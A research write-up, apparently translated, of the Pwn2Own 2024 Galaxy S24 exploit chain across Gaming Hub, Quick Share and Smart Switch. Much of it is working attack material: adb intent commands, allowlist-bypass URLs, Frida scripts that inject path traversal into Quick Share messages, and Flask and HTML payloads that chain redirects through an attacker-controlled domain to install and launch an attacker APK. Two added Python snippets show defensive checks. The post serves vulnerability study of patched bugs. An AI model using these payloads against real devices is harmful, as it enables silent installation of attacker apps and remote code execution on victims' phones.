
Galaxy S24 exploit chain, Pwn2Own

Oct 20


بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ


This article studies the CVEs discovered by Ken Gannon at Pwn2Own 2024. The goal is to understand their exploitation techniques and the underlying issues in a controlled and ethical environment. Source.


Gaming Hub :        (com.samsung.android.game.gamehome) version 7.1.01.7
Quick Share:        (com.samsung.android.app.sharelive) version 13.6.53.6
Quick Share Agent:  (com.samsung.android.aware.service) version 3.5.19.33
Smart Switch Agent: (com.sec.android.easyMover.Agent)   version 2.0.02.24
-----------------------------------------------------------------------------
Author: Ken Gannon
CVE Identifier:  CVE-2024-49419 , CVE-2024-49418 , CVE-2024-49420 , CVE-2024-49421 , CVE-2024-49413

CVE-2024-49419

URL injection in a WebView (com.samsung.android.game.gamehome)

Tracing Intent #1

The first step here is to invoke MainActivity and trace where the supplied data goes.


Here is the validation of the URI after it has been extracted by the earlier functions.

So first it checks that the scheme is gamelauncher, then it extracts the path and checks it in a switch case; the first case, externalweb, hands the URL to the external browser for handling.

adb shell am start -n com.samsung.android.game.gamehome/com.samsung.android.game.gamehome.app.MainActivity -a android.intent.action.VIEW -d "gamelauncher://com.samsung.android.game.gamehome/externalweb?url=https://google.com"

Now we can see another path called gmp, which handles the same url parameter but loads it in GmpWebActivity.

adb shell am start -n com.samsung.android.game.gamehome/com.samsung.android.game.gamehome.app.MainActivity -a android.intent.action.VIEW -d "gamelauncher://com.samsung.android.game.gamehome/gmp?url=https://google.com"

So here we have found the path needed to load our own URL into the WebView, but JavaScript is disabled; to continue...

CVE-2024-49418

Bypassing the URL check to enable JavaScript in the WebView (com.samsung.android.game.gamehome)

Tracing Intent #2

After the intent is delivered to GmpWebActivity, it passes through many functions before the URL is loaded in the WebView; let's check them.

Getting the intent, then checking its path.

Checking whether it is a WebView.

Once it knows it is a WebView it takes the i == 3 branch, then calls class J from gmpDeepLinkUtil, then fetches the URL and passes it to E0.

E0 passes it on to D0.

q0 checks the URL scheme and path.

It loads V0 to set up the WebView configuration before loading.

But before loading the URL it passes it to F for checking.

These live in GmpProviderImpl; as you can see, "e" calls the "k" array, then loops over the URLs in it, and "h" checks the other URLs, so there is an allowlist for some domains, which we can bypass in 2 ways.

  • Buy a domain and give it a subdomain that matches an allowlisted host

"gamelauncher://com.samsung.android.game.gamehome/gmp?url=https://us.mcsvc.samsung.com.attacker.com?location=https://google.com"

  • Bypass the URL check itself

"gamelauncher://com.samsung.android.game.gamehome/gmp?url=https://us.mcsvc.samsung.com\@google.com"
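As an added example (not code from the post or from Samsung's app), here is a strict host allowlist check placed next to the loose prefix-style check that both bypasses above get past; the allowlisted host us.mcsvc.samsung.com is assumed from the bypass URLs.

```python
# Added example (not from the original post or from Samsung's code): a strict
# host allowlist check next to the loose prefix check that the two bypasses
# above defeat. The allowlisted host "us.mcsvc.samsung.com" is an assumption
# taken from the bypass URLs in the post.
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"us.mcsvc.samsung.com"}  # assumed allowlist entry

def loose_check(url: str) -> bool:
    """Prefix-style check: accepts anything that *starts with* an allowlisted
    origin, which is exactly what both bypass URLs rely on."""
    return any(url.startswith("https://" + h) for h in ALLOWED_HOSTS)

def strict_check(url: str) -> bool:
    """Parse first, then compare the exact host. Rejects userinfo, backslashes
    and any host that is not literally on the allowlist."""
    if "\\" in url:
        return False  # WebView/WHATWG parsers treat '\' like '/', Python's does not
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    if parts.username is not None or parts.password is not None:
        return False  # "allowed-host@evil" style userinfo trick
    try:
        if parts.port is not None:
            return False
    except ValueError:
        return False  # malformed port
    host = (parts.hostname or "").rstrip(".")
    return host in ALLOWED_HOSTS

# The inner url= values from the two bypasses in the post, plus a legitimate one.
SAMPLES = {
    "https://us.mcsvc.samsung.com/some/page": True,
    "https://us.mcsvc.samsung.com.attacker.com?location=https://google.com": False,
    "https://us.mcsvc.samsung.com\\@google.com": False,
}

def evaluate():
    """Return {url: (loose_result, strict_result)} for the sample URLs."""
    return {u: (loose_check(u), strict_check(u)) for u in SAMPLES}

if __name__ == "__main__":
    for url, (loose, strict) in evaluate().items():
        print(f"{url}\n  loose={loose}  strict={strict}  expected={SAMPLES[url]}")
```

The loose check accepts all three URLs; the strict check accepts only the legitimate one.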

Now we can load P0 and also run JavaScript.

Back to D0.

Loading our URL.

JavaScript is now enabled.

CVE-2024-49420

Executing "start Activity" from WebView-supplied data to launch exported Activities (com.samsung.android.game.gamehome)

Tracing Intent #3

Now we need to see whether this WebView lets us invoke any exported activity via intent://, so we start by searching for parseURI, which is designed to parse intent:// links into Intent objects, meaning it handles them fully.

GmpWebActivity

com.samsung.android.game.gamehome.gmp.ui.web.o

GmpWebActivity

So far: if the scheme is anything else, "i" is loaded; if the scheme is intent://, it is loaded itself.

So now we need to reach this "a", which loads intent:// and opens exported activities.

Payload time

Here the payload opens Game Hub, then redirects to attacker.com and, using JavaScript and Flask, redirects again to send a new intent:// to the target app.

<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8"><title>Launch</title>
</head>
<body>
  <h1>
    <a href="intent://com.samsung.android.game.gamehome/gmp?url=https%3A%2F%2Fus.mcsvc.samsung.com%40attacker.zerodoridlabs.com%2F%3Flocation%3Dlaunch#Intent;scheme=gamelauncher;action=android.intent.action.VIEW;component=com.samsung.android.game.gamehome/com.samsung.android.game.gamehome.app.MainActivity;end">
      Launch via GameHub
    </a>
  </h1>

  <!-- (B) Auto-redirect: only when ?location=launch -->
  <script>
    const params = new URLSearchParams(window.location.search);
    const loc = (params.get('location') || '').toLowerCase();
    if (loc === 'launch') window.location.replace('/launch');
  </script>
</body>
</html>




from pathlib import Path
from flask import Flask, redirect

BASE = Path(__file__).resolve().parent
app = Flask(__name__, static_folder=str(BASE), static_url_path="")

@app.route("/")
def root():
    return app.send_static_file("index.html")  # / and /index.html both work now

@app.route("/launch")
def launch_share():
    return redirect("intent:#Intent;action=android.intent.action.MAIN;category=android.intent.category.LAUNCHER;component=com.withsecure.dz/com.WithSecure.dz.activities.MainActivity;end", code=302)

if __name__ == "__main__":
    ssl_context = ("/etc/letsencrypt/live/zerodoridlabs.com/fullchain.pem",
                   "/etc/letsencrypt/live/zerodoridlabs.com/privkey.pem")
    app.run(host="0.0.0.0", port=443, debug=False, ssl_context=ssl_context)



CVE-2024-49413

Missing application signature check before installation (com.sec.android.easyMover.Agent)
  • Note: Gaming Hub and Smart Switch both have control over the vulnerable Activity

Smart Switch

Gaming Hub can invoke this exported Activity.

public final void onCreate(Bundle bundle) {
    Log.i("[SmartSwitchAgent]SsmUpdateCheckActivity", "onCreate");
    super.onCreate(bundle);
    Intent intent = getIntent(); // Intent goes here
    if (intent == null) {
        finish();
    } else {
        this.TheAction = intent.getAction();
        this.TheExtra = intent.getStringExtra("MODE"); // we will see it later
        if (!"com.sec.android.easyMover.Agent.WATCH_INSTALL_SMART_SWITCH".equals(this.TheAction)) {
            Log.w("[SmartSwitchAgent]SsmUpdateCheckActivity", "Undefined action! - " + this.TheAction);
            finish();
        }
    }
    d.a(getApplication());
    Context applicationContext = getApplicationContext();
    this.f1116o = applicationContext;
    this.PackageInfo = g.PackageInfoVersion(applicationContext, "com.sec.android.easyMover");
    Log.i("[SmartSwitchAgent]SsmUpdateCheckActivity", "Current SSM ver : " + this.PackageInfo);
}



The ssm_uri here can be supplied via content:// or file://.

This renames the apk we pass in to SmartSwitchMobile.apk, copies it into /files/, then installs it.

public final void g(String str, String str2) { // The installing point
    String strConcat = "startCopyAndInstall - state : ".concat(a4.a.r(this.f2919a));
    String str3 = f2917r;
    Log.i(str3, strConcat);
    int i5 = this.f2919a;
    if (i5 == 2 || i5 == 5 || i5 == 4) {
        Log.d(str3, "update package on going.");
        return;
    }
    this.f2919a = 2;
    if (str == null || str2 == null) {
        b(true);
        return;
    }
    Log.i(str3, "startApkCopy");
    this.f2919a = 4;
    ArrayList arrayList = this.f2932n;
    int size = arrayList.size();
    while (true) {
        size--;
        if (size < 0) {
            break;
        } else {
            ((q4.e) ((x) arrayList.get(size))).b();
        }
    }
    long j5 = this.f2921c;
    if (j5 > 0) {
        this.f2933o.sendEmptyMessageDelayed(3000, j5);
    }
    if (!s4.a.k(this.f2931m, str, str2, new f.b(this))) {
        b(false);
    } else {
        Log.i(str3, "startApkInstall - apkFilePath : ".concat(str));
        e(str, null);
    }
}



As you can see, once we reach "g" the installation process begins; now the goal is to get our apk downloaded onto the phone and installed.


CVE-2024-49421

Path Traversal when transferring data from the attacker's phone (com.samsung.android.aware.service)(com.samsung.android.app.sharelive)

Let's see how this works. This is Samsung's Quick Share agent, designed to share files with nearby users or to transfer them via a QR code.

<html>
  <body>
   <h1>
      <a href="intent://quickshare.samsungcloud.com/<DownloadCode>;Intent;component=com.samsung.android.app.sharelive/com.samsung.android.app.sharelive.presentation.applink.QrCodeAppLinkActivity;scheme=https;end;">download</a>
   </h1>
</body>
</html>


So at this point, using Quick Share, we can download the apk to /sdcard/Download/Quick Share/, but Smart Switch cannot access it.

Path traversal in com.samsung.android.aware.service
  • Receiver

So far we have seen how the app connects to the attacker's phone and receives data from it.

I tried to look at it from the sender side but could not find it, so let's look at it from the receiver side; I think both use the same method to build the JSON and receive it.

Finally we reached e2.t.n!

This n JSONObject holds the special message sent from the attacker's phone to the victim's phone; we can hook this n and see what it contains while the download code is being created. This is how it looks when we try to inject into it to change the file path.

console.log("script loaded");

Java.perform(function() {
    var AttackerClass = Java.use('e2.t');
    AttackerClass.n.overload('org.json.JSONObject', 'e2.h', 'boolean').implementation = function(a, b, c) {
        if (a.has("Path")) {
            a.put("Path", "/../../../../../../GPUWatch_Dump/html/");
        }
        var ret_val = this.n(a, b, c);
        console.log("send json: " + a + "\n" + "send bytes: " + ret_val + "\n");
        return ret_val;
    };
});


We found that there is a regex on path and name here, but if this.f2671g.x is true, name and path go into the first block and are accepted as sent, without any filtering.

What is this.f2671g.x? When we searched for this method, it turns out to be a key named IsPrivateShare in the JSONObject; we can set it to true by tapping it in the Quick Share agent, or by using Frida to patch it before creating the Download Code.

So there is a parameter in the JSONObject that we can set to true to route the message into the unfiltered section.


console.log("script loaded");

Java.perform(function() {
    var AttackerClass = Java.use('e2.t');
    AttackerClass.n.overload('org.json.JSONObject', 'e2.h', 'boolean').implementation = function(a, b, c) {
        if (a.has("IsPrivateShare")) {
            a.put("IsPrivateShare", true);
        }
        if (a.has("Path")) {
            a.put("Path", "/../../../../../../GPUWatch_Dump/html/");
        }
        var ret_val = this.n(a, b, c);
        console.log("send json: " + a + "\n" + "send bytes: " + ret_val + "\n");
        return ret_val;
    };
});
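As an added example (not Samsung's code and not from the post), here is a receiver-side check for the unfiltered-path issue above: it resolves the incoming Path and Name against the download directory and rejects anything that escapes it, whatever IsPrivateShare says. The base directory and the "Name" key are assumptions taken from the post's /sdcard/Download/Quick Share/ path and its "path and name" wording.

```python
# Added example (not from the post or from Samsung's Quick Share agent): a
# receiver-side check that confines an incoming Path/Name pair to the download
# directory no matter what IsPrivateShare says. BASE_DIR and the "Name" key
# are assumptions; the traversal Path comes from the Frida script in the post.
import json
import posixpath

BASE_DIR = "/sdcard/Download/Quick Share"  # assumed receiver download root

def resolve_destination(msg, base_dir=BASE_DIR):
    """Return the absolute destination for a transfer message, or None when the
    requested Path/Name would leave base_dir. Lexical normalisation only, so it
    runs offline; a real receiver should also realpath() before comparing."""
    path = str(msg.get("Path", ""))
    name = str(msg.get("Name", ""))
    # Name must be a bare file name: no separators, no '.'/'..', no NUL.
    if name in ("", ".", "..") or "/" in name or "\\" in name or "\x00" in name:
        return None
    if "\x00" in path or "\\" in path:
        return None
    # Treat Path as relative to base_dir even when the sender makes it absolute.
    rel = path.lstrip("/")
    dest = posixpath.normpath(posixpath.join(base_dir, rel, name))
    root = posixpath.normpath(base_dir)
    if not dest.startswith(root + "/"):
        return None  # the '..' components escaped the download root
    return dest

def check_messages(lines):
    """Parse one JSON transfer message per line; return (IsPrivateShare, dest)."""
    results = []
    for line in lines:
        msg = json.loads(line)
        results.append((bool(msg.get("IsPrivateShare", False)), resolve_destination(msg)))
    return results

# Constructed sample messages (only the traversal Path is taken from the post).
SAMPLE_MESSAGES = [
    '{"Name": "photo.jpg", "Path": "", "IsPrivateShare": false}',
    '{"Name": "drozer.apk", "Path": "/../../../../../../GPUWatch_Dump/html/", "IsPrivateShare": true}',
    '{"Name": "../evil.apk", "Path": "sub", "IsPrivateShare": true}',
]

if __name__ == "__main__":
    for flag, dest in check_messages(SAMPLE_MESSAGES):
        print(f"IsPrivateShare={flag}: {'rejected' if dest is None else dest}")
```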


So now, using this script, we can change the Path to GPUWatch_Dump, but what is that?

What is com.samsung.gpuwatchapp?

GPUWatch is a tool for Samsung developers that provides real-time monitoring of GPU activity inside an app. It lets developers watch GPU usage and performance metrics directly on screen, which helps with debugging and optimization. When I searched my own Samsung phones I only found it on my friend's S10 and S25, but those had already updated Quick Share and the Agent, so I could not find a phone on which to build the full exploit.

In GPUWatch's apk we found that we can use it to hand the apk to Smart Switch as the ssm_uri for installation.

Now we know how the content URI is structured.

content://com.samsung.gpuwatchapp.HtmlDumpProvider/drozer.apk

  • Full payload

from pathlib import Path
from flask import Flask, redirect

BASE = Path(__file__).resolve().parent
app = Flask(__name__, static_folder=str(BASE), static_url_path="")

@app.route("/")
def root():
    return app.send_static_file("index.html")  # / and /index.html both work now

download_code = "your_download_code_here"
ssm_uri = "content://com.samsung.gpuwatchapp.HtmlDumpProvider/drozer.apk"

@app.route("/download")
def launch_quickshare():
    return redirect("intent://qr.quickshare.samsungcloud.com/"+download_code+";Intent;component=com.samsung.android.app.sharelive/com.samsung.android.app.sharelive.presentation.applink.QrCodeAppLinkActivity;scheme=https;end;", code=302)

@app.route("/install")
def launch_install():
    return redirect("intent:#Intent;component=com.sec.android.easyMover.Agent/com.sec.android.easyMover.Agent.ui.SsmUpdateCheckActivity;action=com.sec.android.easyMover.Agent.WATCH_INSTALL_SMART_SWITCH;S.MODE=DIALOG;S.ssm_action=anything;S.ssm_uri="+ssm_uri+";end", code=302)

@app.route("/launch")
def launch_drozer():
    return redirect("intent:#Intent;component=com.withsecure.dz/com.WithSecure.dz.activities.MainActivity;end", code=302)

if __name__ == "__main__":
    ssl_context = ("/etc/letsencrypt/live/zerodoridlabs.com/fullchain.pem",
                   "/etc/letsencrypt/live/zerodoridlabs.com/privkey.pem")
    app.run(host="0.0.0.0", port=443, debug=False, ssl_context=ssl_context)



<h1>
  <a id="start"
     href="intent://com.samsung.android.game.gamehome/gmp?url=https%3A%2F%2Fus.mcsvc.samsung.com%40attacker.zerodoridlabs.com%2F%3Flocation%3Dlaunch#Intent;scheme=gamelauncher;action=android.intent.action.VIEW;component=com.samsung.android.game.gamehome/com.samsung.android.game.gamehome.app.MainActivity;end">
    Start
  </a>
</h1>

<script>
const STEP = 15000; // 15s
const qs = new URLSearchParams(location.search);
const host = qs.get('attacker') || location.host;
const base = (host.includes('://') ? '' : location.protocol + '//') + host;

function go(p){ location.href = base + p; }

document.getElementById('start').addEventListener('click', () => {
  setTimeout(() => go('/download'), 2000);        // after 2s
  setTimeout(() => go('/install'), 2000+STEP);    // +15s
  setTimeout(() => go('/launch'), 2000+STEP*2);   // +15s
}, { once:true });
</script>



Summary

  • The user taps Start

  • Game Hub opens a WebView with JavaScript enabled

  • Game Hub opens Quick Share with the download code and downloads the attacker's app

  • The Quick Share Agent copies it into GPUWatch_dump/html

  • Smart Switch takes the ssm_uri from the GPUWatch content provider to install the attacker's app

  • Game Hub launches the attacker's app → RCE

I did everything I could, so if I missed something or something is not clear, I apologize; if you have questions you can reach me on LinkedIn and I will do my best to help. Also, don't forget to watch Ken's "Chainspotting 2" talk, which for me is the best one. He also has an earlier guide called "ChainSpotting" that came out a few years ago under the same title.


ٱلسَّلَامُ عَلَيْكُمْ وَرَحْمَةُ ٱللهِ وَبَرَكَاتُهُ


Translator's note: the article is presented in full, with the author's work preserved.
